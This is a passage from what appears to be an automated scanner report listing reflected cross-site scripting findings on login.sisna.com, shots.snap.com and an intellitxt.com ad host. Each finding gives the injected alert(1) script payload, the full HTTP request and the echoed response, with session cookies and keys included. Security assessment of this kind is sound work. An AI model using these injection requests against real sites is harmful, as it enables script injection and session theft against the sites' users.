...[SNIP]...

4.24. http://login.sisna.com/login_multiple/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.sisna.com
Path:   /login_multiple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7a2a"><script>alert(1)</script>13fcf75185c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login_multiple/?SAMLRequest=fZLNTsMwEITvSLxD5HuSpgWErCZVKUJU4ieigQM3x90mBmcdvE4Lb4%2BbUhUO9Gat1zPfrHc8%2BWx0sAZLymDKkmjAAkBplgqrlD0XN%2BElm2SnJ2MSjW75tHM1PsFHB%2BQC%2FxKJ9xcp6yxyI0gRR9EAcSf5Ynp%2Fx4fRgLfWOCONZsH8OmVthfBmymb1rkFUAAJVje9YVqJUAkpVSV1DXQELXvZYwy3WnKiDOZIT6HxpkCTh4CwcXhTJkI8u%2BfnolQX5j9OVwl2CY1jlron4bVHkYf64KHqBtVqCffDdKauMqTRE0jRb%2B1wQqbUvr4QmjzclAus84MwgdQ3YBdi1kvD8dJey2rmWeBxvNpvoIBOL2LOg2J0lsawfLO%2Bz2V8TPU4u9s4sO2iP419S2c%2BHbXPMr3OjlfwKplqbzcyCcD6Es53PcGNsI9z%2FbkmU9BW1DFd9K%2B%2BQWpBqpWDJgjjbuf7dDL8v3w%3D%3D&RelayState=https%3A%2F%2Fwww.google.com%2Fa%2Fsisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2&b7a2a"><script>alert(1)</script>13fcf75185c=1 HTTP/1.1
Host: login.sisna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:45:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 2788
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
sisna.com%2FServiceLogin%3Fservice%3Dmail%26passive%3Dtrue%26rm%3Dfalse%26continue%3Dhttp%253A%252F%252Fmail.google.com%252Fa%252Fsisna.com%252F%26bsv%3Dllya694le36z%26ltmpl%3Ddefault%26ltmplcache%3D2&b7a2a"><script>alert(1)</script>13fcf75185c=1" method="post" name="login">
...[SNIP]...

4.25. http://shots.snap.com/rk.php [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /rk.php

Issue detail

The value of the vid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f363"><script>alert(1)</script>b45a55df056 was submitted in the vid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rk.php?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&lang=en-us&th=silver&src=www.slaviks-blog.com&cp=Shotsense&s=small&svc=&tag=&atext=posted&title=Musings%20on%20Database%20Security&dfs=10&call=0&uid=16266132404ce087181f51bbd2d1a9b9&vid=89fdd0457a773fb9e78a2ee3e0b8ebd35f363"><script>alert(1)</script>b45a55df056&fl=null&size=320x79 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:41 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 01:23:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303781021; expires=Wed, 24-Apr-2013 01:23:41 GMT; path=/; domain=.snap.com
Set-Cookie: session=id%3D1b339d819ce287ba77eab1ba534cca22%26time%3D1303781021%26created_time%3D1303781021%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd35f363%2522%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253Eb45a55df056%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F; path=/; domain=.snap.com
Set-Cookie: session=id%3D1b339d819ce287ba77eab1ba534cca22%26time%3D1303781021%26created_time%3D1303781021%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd35f363%2522%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253Eb45a55df056%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F%26call%3D1; path=/; domain=.snap.com
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:23:40 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 9898

<html>
<head>


<style>


body {
margin: 0;
padding: 0;
background: #f2f2f2 url('http://i.ixnp.com/images/hdr-spons.gif') no-repeat fixed 97% 94%;

border: 0;
}

#keywordTable {
fon
...[SNIP]...
<img src="http://direct.i.ixnp.com/images/ss_conf/89fdd0457a773fb9e78a2ee3e0b8ebd35f363"><script>alert(1)</script>b45a55df056/10.11.224:7781" width="1" height="1">
...[SNIP]...

4.26. http://shots.snap.com/shot/ [size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /shot/

Issue detail

The value of the size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e7ba"><script>alert(1)</script>d13f9b9ff8c was submitted in the size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shot/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small6e7ba"><script>alert(1)</script>d13f9b9ff8c&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:27:04 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:27:03 GMT; path=/; domain=.snap.com
Set-Cookie: spa=spauser%3D1%26spadomain%3Dwww.slaviks-blog.com; expires=Fri, 23-Apr-2021 01:27:04 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 4635


<script>
function showGLOW() {
document.getElementById('snapshot_glow').style.display = '';
}
function hideGLOW() {
document.getElementById('snapshot_glow').style.display = 'none';
}

function
...[SNIP]...
m/preview.php?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small6e7ba"><script>alert(1)</script>d13f9b9ff8c&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%
...[SNIP]...

4.27. http://shots.snap.com/shot/ [svc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /shot/

Issue detail

The value of the svc request parameter is copied into the HTML document as plain text between tags. The payload 20f2d<script>alert(1)</script>86efd429486 was submitted in the svc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shot/?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=20f2d<script>alert(1)</script>86efd429486&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:37:39 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:37:38 GMT; path=/; domain=.snap.com
Set-Cookie: spa=spauser%3D1%26spadomain%3Dwww.slaviks-blog.com; expires=Fri, 23-Apr-2021 01:37:39 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 2746

<html>
<head>
<title>Snap Shot - Error: Unknown Shot Type</title>
<link rel="stylesheet" href="http://i.ixnp.com/rsa/v6.59/rich-shot-common.css" type="text/css">
<link rel="stylesheet" href="http://i.
...[SNIP]...
<i>20f2d<script>alert(1)</script>86efd429486</i>
...[SNIP]...

4.28. http://shots.snap.com/shot/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://shots.snap.com
Path:   /shot/

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 44ce3<a%20b%3dc>b5cf3745f80 was submitted in the url parameter. This input was echoed as 44ce3<a b=c>b5cf3745f80 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /shot/?url=44ce3<a%20b%3dc>b5cf3745f80&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:49 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:23:48 GMT; path=/; domain=.snap.com
Set-Cookie: spa=spauser%3D1%26spadomain%3Dwww.slaviks-blog.com; expires=Fri, 23-Apr-2021 01:23:49 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 4058


<script>
function showGLOW() {
document.getElementById('snapshot_glow').style.display = '';
}
function hideGLOW() {
document.getElementById('snapshot_glow').style.display = 'none';
}

function
...[SNIP]...
<a b=c>b5cf3745f80">44ce3<a b=c>b5cf3745f80/</a>
...[SNIP]...

4.29. http://shots.snap.com/shot/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /shot/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7832"><script>alert(1)</script>423eac9122e was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shot/?url=a7832"><script>alert(1)</script>423eac9122e&key=6e8afd4f63cdc7886a3f718aa78c7375&src=www.slaviks-blog.com&cp=&sb=1&v=6.59&size=small&lang=en-us&search_type=spasense&vis=0&origin=shots_bubble&act=only_link&po=0&rp=null&tok=00034db816da48d6409a1a9cffc9091a0226f9839f&has_img=0&ol=0&ex=0&ad=unknown&ip=173.193.214.243&ua=Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+AppleWebKit%2F534.16+%28KHTML%2C+like+Gecko%29+Chrome%2F10.0.648.205+Safari%2F534.16&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&nl=0&referrer=http%3A%2F%2Fwww.slaviks-blog.com%2F&svc=&rt=1303780546551&w=320&h=207&target=_blank&tag=&goto=Go%20to%20%25URL&sc=1 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:40 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:23:39 GMT; path=/; domain=.snap.com
Set-Cookie: spa=spauser%3D1%26spadomain%3Dwww.slaviks-blog.com; expires=Fri, 23-Apr-2021 01:23:40 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 4245


<script>
function showGLOW() {
document.getElementById('snapshot_glow').style.display = '';
}
function hideGLOW() {
document.getElementById('snapshot_glow').style.display = 'none';
}

function
...[SNIP]...
<a target=_parent style="border:0" href="a7832"><script>alert(1)</script>423eac9122e" title="Go to a7832">
...[SNIP]...

4.30. http://shots.snap.com/snap_shots.js [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /snap_shots.js

Issue detail

The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 87005<script>alert(1)</script>538521ad19a was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snap_shots.js?ap=1&si=0&key=6e8afd4f63cdc7886a3f718aa78c737587005<script>alert(1)</script>538521ad19a&sb=0&link_icon=on&oi=0&cl=0&po=0&th=green&preview_trigger=icon&domain=www.slaviks-blog.com HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:05 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:23:04 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D28b430f0e9bc5adec4344fe7df81b61d%26exp%3D1366766585%26v%3D2; expires=Wed, 24-Apr-2013 01:23:05 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D28b430f0e9bc5adec4344fe7df81b61d%26exp%3D1366766585%26v%3D2%26origin%3Dshots; expires=Wed, 24-Apr-2013 01:23:05 GMT; path=/; domain=.snap.com
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 03:23:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 15266

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...
ain_js/v6.59/";
s.parentNode.insertBefore(js, s);
var js = document.createElement("script");
js.type = "text/javascript";
js.src = "http://shots.snap.com/asj/v1/6e8afd4f63cdc7886a3f718aa78c737587005<script>alert(1)</script>538521ad19a/" + SNAP_COM.hash(document.location.href) +
"/auto_shot.js?sz="+SNAP_COM.size()+"&lm="+escape(document.lastModified)+"&size=small&accept=shots";
s.parentNode.insertBefore(js, s);
}
SNAP_
...[SNIP]...

4.31. http://shots.snap.com/snap_shots.js [preview_trigger parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /snap_shots.js

Issue detail

The value of the preview_trigger request parameter is copied into the HTML document as plain text between tags. The payload d95c1<script>alert(1)</script>aa502bc404 was submitted in the preview_trigger parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snap_shots.js?ap=1&si=0&key=6e8afd4f63cdc7886a3f718aa78c7375&sb=0&link_icon=on&oi=0&cl=0&po=0&th=green&preview_trigger=icond95c1<script>alert(1)</script>aa502bc404&domain=www.slaviks-blog.com HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:27:49 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:27:48 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D1db8e18d71451b093b52af603969a253%26exp%3D1366766869%26v%3D2; expires=Wed, 24-Apr-2013 01:27:49 GMT; path=/; domain=.snap.com
Set-Cookie: user=id%3D1db8e18d71451b093b52af603969a253%26exp%3D1366766869%26v%3D2%26origin%3Dshots; expires=Wed, 24-Apr-2013 01:27:49 GMT; path=/; domain=.snap.com
Cache-Control: max-age=7200
Expires: Tue, 26 Apr 2011 03:27:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 15260

//<!--
/*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved.
* Your use of this code is subject to the Snap Shots Terms of Service
* located at https://account.snap
...[SNIP]...
ow_internal:false,preview_only:false,preview_type:null,no_rss:0,rich_only:false,plugin:false,rescan_after_load:false,thumbnail_precrawl:0,show_link_icon:false,link_icon_types:true,preview_trigger:"icond95c1<script>alert(1)</script>aa502bc404",image_trigger:false,shots_domain_match:null,shot_check:1,search_type:"spasense",redirect_param:null,client_ip:"173.193.214.243",user_agent:"Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29
...[SNIP]...

4.32. http://spamlaws.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b731%3balert(1)//58a9bba0f77 was submitted in the jscallback parameter. This input was echoed as 8b731;alert(1)//58a9bba0f77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /al.asp?ts=20110426142115&adid=0%2C0%2C0%2C0%2C4513%2C0&cc=us&di=31742909%2C31742907%2C31742978%2C31326997%2C31051141%2C31326990&hk=1&ipid=10143&mh=b5e073b8ec12fc1181fc2fd3b1a46a79&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=35e167e1c66fee62be98fe397190a726&pvu=59196390591647FA9372FACB8C10DBA5&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=327%2C302%3B265%2C378%3B722%2C499%3B581%2C620%3B401%2C989%3B319%2C1289%3B&prf=ll%3A5003%7Cintl%3A6792%7Cpreprochrome%3A2%7Cgetconchrome%3A56%7Cadvint%3A6889%7Cadvl%3A6889%7Ctl%3A9596&jscallback=$iTXT.js.callback18b731%3balert(1)//58a9bba0f77 HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:54 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Tue, 26 Apr 2011 14:21:54 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback18b731;alert(1)//58a9bba0f77();}catch(e){}

4.33. http://spamlaws.us.intellitxt.com/iframescript.jsp [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /iframescript.jsp

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d361"><script>alert(1)</script>526ac49452b was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2759%2C2761%2C2791%26type%3Dscript%26ipid%3D10143%26sfid%3D07d361"><script>alert(1)</script>526ac49452b HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
